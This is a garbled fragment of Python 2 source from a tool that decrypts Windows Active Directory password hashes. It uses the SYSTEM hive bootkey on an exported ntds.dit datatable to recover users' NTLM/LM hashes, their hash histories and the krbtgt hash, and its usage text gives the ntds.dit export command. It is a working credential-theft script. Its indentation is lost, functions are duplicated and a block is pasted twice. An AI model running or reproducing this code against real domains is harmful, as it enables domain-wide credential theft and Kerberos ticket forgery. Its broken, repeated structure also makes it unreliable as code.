def decKrbtgt(hiveFile, hashFile):
#get the bootkey from the system hive
bootkey = get_syskey(hiveFile)
f = open(hashFile)
raw = f.read()
f.close()
krbtgt_acct = None
rawPekKey = None
rawRID = None
rawNTLMhash = None
# split along account boundaries
accts = raw.split("ATTm3")
for acct in accts:
if "ATTk590689" in acct:
for part in acct.split('\n'):
if part.startswith("ATTk590689"):
rawPekKey = part.split(":")[1].strip().strip('\'')
elif "u\'krbtgt\'" in acct and "ATTk589914" in acct:
for part in acct.split('\n'):
if part.startswith("ATTr589970"):
rawRID = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589914"):
rawNTLMhash = part.split(":")[1].strip().strip('\'')
print decUserHash(bootkey, rawPekKey, "krbtgt", rawRID, "", rawNTLMhash)
def decKrbtgt(hiveFile,hashFile):
#get the bootkey from the system hive
bootkey = get_syskey(hiveFile)
f = open(hashFile)
raw = f.read()
f.close()
krbtgt_acct = None
rawPekKey = None
rawRID = None
rawNTLMhash = None
# split along account boundaries
accts = raw.split("ATTm3")
for acct in accts:
if "ATTk590689" in acct:
for part in acct.split('\n'):
if part.startswith("ATTk590689"):
rawPekKey = part.split(":")[1].strip().strip('\'')
elif "u\'krbtgt\'" in acct and "ATTk589914" in acct:
for part in acct.split('\n'):
if part.startswith("ATTr589970"):
rawRID = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589914"):
rawNTLMhash = part.split(":")[1].strip().strip('\'')
print decUserHash(bootkey, rawPekKey, "krbtgt", rawRID, "", rawNTLMhash)
def decUserHashHistories(hiveFile, hashFile):
#get the bootkey from the system hive
bootkey = get_syskey(hiveFile)
f = open(hashFile)
raw = f.read()
f.close()
krbtgt_acct = None
rawPekKey = None
rawRID = None
rawNTLMhash = None
rawLMhash = None
rawNTLMhashHistory = None
rawLMhashHistory = None
# split along account boundaries
accts = raw.split("ATTm3")
for acct in accts:
if "ATTk590689" in acct:
for part in acct.split('\n'):
if part.startswith("ATTk590689"):
rawPekKey = part.split(":")[1].strip().strip('\'')
# only examine accts with a valid NTLM hash history
elif "ATTk589918" in acct:
parts = acct.split('\n')
for part in parts:
if part.startswith("ATTm590045"):
name = part.split(":")[1].strip()[1:].strip('\'')
elif part.startswith("ATTr589970"):
rawRID = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589984"):
rawLMhashHistory = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589918"):
rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')
histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID,
rawLMhashHistory,
rawNTLMhashHistory)
for history in histories:
print history
def decUserHashHistories(hiveFile,hashFile):
#get the bootkey from the system hive
bootkey = get_syskey(hiveFile)
f = open(hashFile)
raw = f.read()
f.close()
krbtgt_acct = None
rawPekKey = None
rawRID = None
rawNTLMhash = None
rawLMhash = None
rawNTLMhashHistory = None
rawLMhashHistory = None
# split along account boundaries
accts = raw.split("ATTm3")
for acct in accts:
if "ATTk590689" in acct:
for part in acct.split('\n'):
if part.startswith("ATTk590689"):
rawPekKey = part.split(":")[1].strip().strip('\'')
# only examine accts with a valid NTLM hash history
elif "ATTk589918" in acct:
parts = acct.split('\n')
for part in parts:
if part.startswith("ATTm590045"):
name = part.split(":")[1].strip()[1:].strip('\'')
elif part.startswith("ATTr589970"):
rawRID = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589984"):
rawLMhashHistory = part.split(":")[1].strip().strip('\'')
elif part.startswith("ATTk589918"):
rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')
histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID, rawLMhashHistory, rawNTLMhashHistory)
for history in histories:
print history
histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID,
rawLMhashHistory,
rawNTLMhashHistory)
for history in histories:
print history
if len(sys.argv) == 3:
decUserHashes(sys.argv[1], sys.argv[2])
elif len(sys.argv) == 4:
if (sys.argv[3].lower() == "-history"):
decUserHashHistories(sys.argv[1], sys.argv[2])
else:
decKrbtgt(sys.argv[1], sys.argv[2])
elif len(sys.argv) == 5:
bootkey = get_syskey(sys.argv[1])
decUserHash(bootKey, sys.argv[2], "user", sys.argv[3], sys.argv[4])
else:
print "\nFirst dump the datatable using esentutl.py:"
print "\tesentutl.py /path/to/ntds.dit export -table datatable | grep -E \"ATTk590689|ATTm3|ATTm590045|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918\" > outfile.txt\n"
print "Then : %s <system hive> <hash file>" % sys.argv[0]
print "\tor : %s <system hive> <hash file> -krbtgt" % sys.argv[0]
print "\tor : %s <system hive> <hash file> -history" % sys.argv[0]
print "\tor : %s <system hive> <rawPekKey> <rawRid> <rawNTLMhash>\n" % sys.argv[
0]
sys.exit(1)
rawNTLMhashHistory = part.split(":")[1].strip().strip('\'')
histories = decUserHashHistory(bootkey, rawPekKey, name, rawRID, rawLMhashHistory, rawNTLMhashHistory)
for history in histories:
print history
if len(sys.argv) == 3:
decUserHashes(sys.argv[1], sys.argv[2])
elif len(sys.argv) == 4:
if (sys.argv[3].lower() == "-history"):
decUserHashHistories(sys.argv[1], sys.argv[2])
else:
decKrbtgt(sys.argv[1], sys.argv[2])
elif len(sys.argv) == 5:
bootkey = get_syskey(sys.argv[1])
decUserHash(bootKey, sys.argv[2], "user", sys.argv[3], sys.argv[4])
else:
print "\nFirst dump the datatable using esentutl.py:"
print "\tesentutl.py /path/to/ntds.dit export -table datatable | grep -E \"ATTk590689|ATTm3|ATTm590045|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918\" > outfile.txt\n"
print "Then : %s <system hive> <hash file>" % sys.argv[0]
print "\tor : %s <system hive> <hash file> -krbtgt" % sys.argv[0]
print "\tor : %s <system hive> <hash file> -history" % sys.argv[0]
print "\tor : %s <system hive> <rawPekKey> <rawRid> <rawNTLMhash>\n" % sys.argv[0]
sys.exit(1)
